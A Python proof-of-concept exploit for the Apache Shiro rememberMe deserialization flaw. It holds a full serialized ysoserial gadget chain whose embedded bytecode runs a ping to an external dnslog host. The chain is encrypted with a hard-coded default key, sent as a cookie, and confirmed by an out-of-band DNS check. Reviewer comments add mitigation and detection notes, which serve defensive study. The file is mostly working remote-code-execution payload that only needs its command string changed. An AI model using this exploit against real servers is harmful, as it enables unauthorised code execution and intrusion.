poc.py
#!/usr/bin/env python
# coding:utf-8
import time
import base64
import uuid
import requests
import random
import binascii
from Crypto.Cipher import AES
def poc(url):
    """Check one URL for the rememberMe deserialization issue via a DNS callback.

    Sends a single GET request carrying the cookie built by ``generator`` and
    then looks for a per-run marker in the DNS log served by
    ``admin.dnslog.link``.

    Returns True only when the marker shows up in that log; every other
    outcome, including any exception, returns False.
    """
    # Bare host[:port] input gets a scheme; ":443" anywhere in it selects https.
    if '://' in url:
        target = url
    elif ':443' in url:
        target = 'https://%s' % url
    else:
        target = 'http://%s' % url

    confirmed = False
    try:
        # Four-digit marker that ties the DNS callback to this run.
        marker = random.randint(1000, 9999)
        cookie_value = generator(marker).decode()
        requests.get(target, cookies={'rememberMe': cookie_value}, timeout=10)
        # Give the callback time to reach the DNS log before reading it.
        time.sleep(3)
        # NOTE(review): the log is fetched over plain HTTP from a third-party
        # service, with no timeout, and the path looks like a shared account.
        # A four-digit marker can collide with someone else's run, so treat a
        # hit as an indication to investigate, not as proof.
        dns_log = requests.get("http://admin.dnslog.link/api/dns/test/test/")
        if "%s.shiro" % (str(marker)) in dns_log.content:
            print("[+] %s is vulnerable." % (url))
            confirmed = True
    except:
        # NOTE(review): every failure (network error, blocked egress DNS, the
        # log service being down, a Python 3 str/bytes mismatch) is swallowed
        # here, so False means "not confirmed", never "not vulnerable".
        pass
    return confirmed
def generator(numint):
    """Build the base64 ``rememberMe`` cookie value used by ``poc``.

    Steps, as written below:
      1. Hex-decode a pre-built Java serialization stream (it starts with the
         ``ACED0005`` stream magic), after substituting the hex of the ASCII
         digits of ``numint`` into the ``{numint}`` slot.
      2. Pad the bytes to a multiple of ``AES.block_size``; the pad byte value
         equals the pad length (PKCS#7-style).
      3. Encrypt with AES-CBC under the hard-coded base64 key and a fresh
         16-byte IV taken from ``uuid.uuid4().bytes``.
      4. Return ``base64(iv + ciphertext)``.

    What the blob contains (readable from the hex itself): class names from
    ``java.util.PriorityQueue``, ``org.apache.commons.collections4``
    (``TransformingComparator``, ``InvokerTransformer``), the JDK-internal
    ``TemplatesImpl``, and ``ysoserial`` helper classes. The only embedded
    command string is ``ping -c 3 <numint>.shiro.test.dnslog.link``, i.e. an
    out-of-band DNS marker.

    Defender notes:
      * The cookie is only accepted by a server that decrypts ``rememberMe``
        with this exact key, and the object graph only does anything if the
        named gadget classes are on the server's classpath. A negative result
        from this script therefore does not show the deployment is safe.
      * Mitigation is to configure a unique, randomly generated rememberMe
        cipher key, keep the framework and the collections library on fixed
        releases, and restrict which classes may be deserialized.
      * Detection: unusually long ``rememberMe`` cookie values in request
        logs, and application servers issuing DNS lookups or ``ping`` to
        hosts they have no reason to contact.

    NOTE(review): ``str.decode('hex')`` and ``binascii.b2a_hex(str(...))``
    rely on Python 2 string semantics.
    """
    # Pre-built serialized object graph; spaces are only for readability and
    # are stripped before hex-decoding. {numint} is the per-run marker slot.
    payload = "ACED0005 73720017 6A617661 2E757469 6C2E5072 696F7269 74795175 65756594 DA30B4FB 3F82B103 00024900 0473697A 654C000A 636F6D70 61726174 6F727400 164C6A61 76612F75 74696C2F 436F6D70 61726174 6F723B78 70000000 02737200 426F7267 2E617061 6368652E 636F6D6D 6F6E732E 636F6C6C 65637469 6F6E7334 2E636F6D 70617261 746F7273 2E547261 6E73666F 726D696E 67436F6D 70617261 746F722F F984F02B B108CC02 00024C00 09646563 6F726174 65647100 7E00014C 000B7472 616E7366 6F726D65 7274002D 4C6F7267 2F617061 6368652F 636F6D6D 6F6E732F 636F6C6C 65637469 6F6E7334 2F547261 6E73666F 726D6572 3B787073 7200406F 72672E61 70616368 652E636F 6D6D6F6E 732E636F 6C6C6563 74696F6E 73342E63 6F6D7061 7261746F 72732E43 6F6D7061 7261626C 65436F6D 70617261 746F72FB F49925B8 6EB13702 00007870 7372003B 6F72672E 61706163 68652E63 6F6D6D6F 6E732E63 6F6C6C65 6374696F 6E73342E 66756E63 746F7273 2E496E76 6F6B6572 5472616E 73666F72 6D657287 E8FF6B7B 7CCE3802 00035B00 05694172 67737400 135B4C6A 6176612F 6C616E67 2F4F626A 6563743B 4C000B69 4D657468 6F644E61 6D657400 124C6A61 76612F6C 616E672F 53747269 6E673B5B 000B6950 6172616D 54797065 73740012 5B4C6A61 76612F6C 616E672F 436C6173 733B7870 75720013 5B4C6A61 76612E6C 616E672E 4F626A65 63743B90 CE589F10 73296C02 00007870 00000000 74000E6E 65775472 616E7366 6F726D65 72757200 125B4C6A 6176612E 6C616E67 2E436C61 73733BAB 16D7AECB CD5A9902 00007870 00000000 77040000 00037372 003A636F 6D2E7375 6E2E6F72 672E6170 61636865 2E78616C 616E2E69 6E746572 6E616C2E 78736C74 632E7472 61782E54 656D706C 61746573 496D706C 09574FC1 6EACAB33 03000949 000D5F69 6E64656E 744E756D 62657249 000E5F74 72616E73 6C657449 6E646578 5A00155F 75736553 65727669 6365734D 65636861 6E69736D 4C00195F 61636365 73734578 7465726E 616C5374 796C6573 68656574 71007E00 0A4C000B 5F617578 436C6173 73657374 003B4C63 6F6D2F73 756E2F6F 72672F61 70616368 652F7861 6C616E2F 696E7465 726E616C 2F78736C 74632F72 756E7469 6D652F48 61736874 61626C65 3B5B000A 5F627974 65636F64 65737400 035B5B42 5B00065F 636C6173 7371007E 000B4C00 055F6E61 6D657100 7E000A4C 00115F6F 75747075 7450726F 70657274 69657374 00164C6A 6176612F 7574696C 2F50726F 70657274 6965733B 78700000 0000FFFF FFFF0074 0003616C 6C707572 00035B5B 424BFD19 156767DB 37020000 78700000 00027572 00025B42 ACF317F8 060854E0 02000078 70000006 A2CAFEBA BE000000 3100380A 00030022 07003607 00250700 26010010 73657269 616C5665 7273696F 6E554944 0100014A 01000D43 6F6E7374 616E7456 616C7565 05AD2093 F391DDEF 3E010006 3C696E69 743E0100 03282956 01000443 6F646501 000F4C69 6E654E75 6D626572 5461626C 65010012 4C6F6361 6C566172 6961626C 65546162 6C650100 04746869 73010013 53747562 5472616E 736C6574 5061796C 6F616401 000C496E 6E657243 6C617373 65730100 354C7973 6F736572 69616C2F 7061796C 6F616473 2F757469 6C2F4761 64676574 73245374 75625472 616E736C 65745061 796C6F61 643B0100 09747261 6E73666F 726D0100 72284C63 6F6D2F73 756E2F6F 72672F61 70616368 652F7861 6C616E2F 696E7465 726E616C 2F78736C 74632F44 4F4D3B5B 4C636F6D 2F73756E 2F6F7267 2F617061 6368652F 786D6C2F 696E7465 726E616C 2F736572 69616C69 7A65722F 53657269 616C697A 6174696F 6E48616E 646C6572 3B295601 0008646F 63756D65 6E740100 2D4C636F 6D2F7375 6E2F6F72 672F6170 61636865 2F78616C 616E2F69 6E746572 6E616C2F 78736C74 632F444F 4D3B0100 0868616E 646C6572 73010042 5B4C636F 6D2F7375 6E2F6F72 672F6170 61636865 2F786D6C 2F696E74 65726E61 6C2F7365 7269616C 697A6572 2F536572 69616C69 7A617469 6F6E4861 6E646C65 723B0100 0A457863 65707469 6F6E7307 00270100 A6284C63 6F6D2F73 756E2F6F 72672F61 70616368 652F7861 6C616E2F 696E7465 726E616C 2F78736C 74632F44 4F4D3B4C 636F6D2F 73756E2F 6F72672F 61706163 68652F78 6D6C2F69 6E746572 6E616C2F 64746D2F 44544D41 78697349 74657261 746F723B 4C636F6D 2F73756E 2F6F7267 2F617061 6368652F 786D6C2F 696E7465 726E616C 2F736572 69616C69 7A65722F 53657269 616C697A 6174696F 6E48616E 646C6572 3B295601 00086974 65726174 6F720100 354C636F 6D2F7375 6E2F6F72 672F6170 61636865 2F786D6C 2F696E74 65726E61 6C2F6474 6D2F4454 4D417869 73497465 7261746F 723B0100 0768616E 646C6572 0100414C 636F6D2F 73756E2F 6F72672F 61706163 68652F78 6D6C2F69 6E746572 6E616C2F 73657269 616C697A 65722F53 65726961 6C697A61 74696F6E 48616E64 6C65723B 01000A53 6F757263 6546696C 6501000C 47616467 6574732E 6A617661 0C000A00 0B070028 01003379 736F7365 7269616C 2F706179 6C6F6164 732F7574 696C2F47 61646765 74732453 74756254 72616E73 6C657450 61796C6F 61640100 40636F6D 2F73756E 2F6F7267 2F617061 6368652F 78616C61 6E2F696E 7465726E 616C2F78 736C7463 2F72756E 74696D65 2F416273 74726163 74547261 6E736C65 74010014 6A617661 2F696F2F 53657269 616C697A 61626C65 01003963 6F6D2F73 756E2F6F 72672F61 70616368 652F7861 6C616E2F 696E7465 726E616C 2F78736C 74632F54 72616E73 6C657445 78636570 74696F6E 01001F79 736F7365 7269616C 2F706179 6C6F6164 732F7574 696C2F47 61646765 74730100 083C636C 696E6974 3E010011 6A617661 2F6C616E 672F5275 6E74696D 6507002A 01000A67 65745275 6E74696D 65010015 28294C6A 6176612F 6C616E67 2F52756E 74696D65 3B0C002C 002D0A00 2B002E01 00257069 6E67202D 63203320 {numint} 2E736869 726F2E74 6573742E 646E736C 6F672E6C 696E6B08 00300100 04657865 63010027 284C6A61 76612F6C 616E672F 53747269 6E673B29 4C6A6176 612F6C61 6E672F50 726F6365 73733B0C 00320033 0A002B00 3401001E 79736F73 65726961 6C2F5077 6E657235 35303139 30393134 31373635 39390100 204C7973 6F736572 69616C2F 50776E65 72353530 31393039 31343137 36353939 3B002100 02000300 01000400 01001A00 05000600 01000700 00000200 08000400 01000A00 0B000100 0C000000 2F000100 01000000 052AB700 01B10000 0002000D 00000006 00010000 002E000E 0000000C 00010000 0005000F 00370000 00010013 00140002 000C0000 003F0000 00030000 0001B100 00000200 0D000000 06000100 00003300 0E000000 20000300 00000100 0F003700 00000000 01001500 16000100 00000100 17001800 02001900 00000400 01001A00 01001300 1B000200 0C000000 49000000 04000000 01B10000 0002000D 00000006 00010000 0037000E 0000002A 00040000 0001000F 00370000 00000001 00150016 00010000 0001001C 001D0002 00000001 001E001F 00030019 00000004 0001001A 00080029 000B0001 000C0000 001B0003 00020000 000FA700 03014CB8 002F1231 B6003557 B1000000 00000200 20000000 02002100 11000000 0A000100 02002300 10000975 71007E00 1A000001 D4CAFEBA BE000000 31001B0A 00030015 07001707 00180700 19010010 73657269 616C5665 7273696F 6E554944 0100014A 01000D43 6F6E7374 616E7456 616C7565 0571E669 EE3C6D47 18010006 3C696E69 743E0100 03282956 01000443 6F646501 000F4C69 6E654E75 6D626572 5461626C 65010012 4C6F6361 6C566172 6961626C 65546162 6C650100 04746869 73010003 466F6F01 000C496E 6E657243 6C617373 65730100 254C7973 6F736572 69616C2F 7061796C 6F616473 2F757469 6C2F4761 64676574 7324466F 6F3B0100 0A536F75 72636546 696C6501 000C4761 64676574 732E6A61 76610C00 0A000B07 001A0100 2379736F 73657269 616C2F70 61796C6F 6164732F 7574696C 2F476164 67657473 24466F6F 0100106A 6176612F 6C616E67 2F4F626A 65637401 00146A61 76612F69 6F2F5365 7269616C 697A6162 6C650100 1F79736F 73657269 616C2F70 61796C6F 6164732F 7574696C 2F476164 67657473 00210002 00030001 00040001 001A0005 00060001 00070000 00020008 00010001 000A000B 0001000C 0000002F 00010001 00000005 2AB70001 B1000000 02000D00 00000600 01000000 3B000E00 00000C00 01000000 05000F00 12000000 02001300 00000200 14001100 00000A00 01000200 16001000 09707400 0450776E 72707701 00787372 00116A61 76612E6C 616E672E 496E7465 67657212 E2A0A4F7 81873802 00014900 0576616C 75657872 00106A61 76612E6C 616E672E 4E756D62 657286AC 951D0B94 E08B0200 00787000 00000178".format(numint=binascii.b2a_hex(str(numint))).replace(' ', '').decode('hex')
    BS = AES.block_size
    # Pad length is BS - len % BS, so an already-aligned input gains a full block.
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    # NOTE(review): fixed key baked into the script; presumably the widely
    # published default rememberMe key for the targeted framework. Verify.
    # Any deployment still using it accepts attacker-built cookies.
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    # uuid4().bytes is 16 random bytes, which matches the AES block size.
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(payload)
    # The IV is prepended so the receiver can split it off before decrypting.
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext
# Runs the check against a loopback lab instance as soon as the module is
# loaded. NOTE(review): there is no __main__ guard, so importing this file
# also sends the request and queries the external DNS log.
poc(url="http://127.0.0.1:9000/")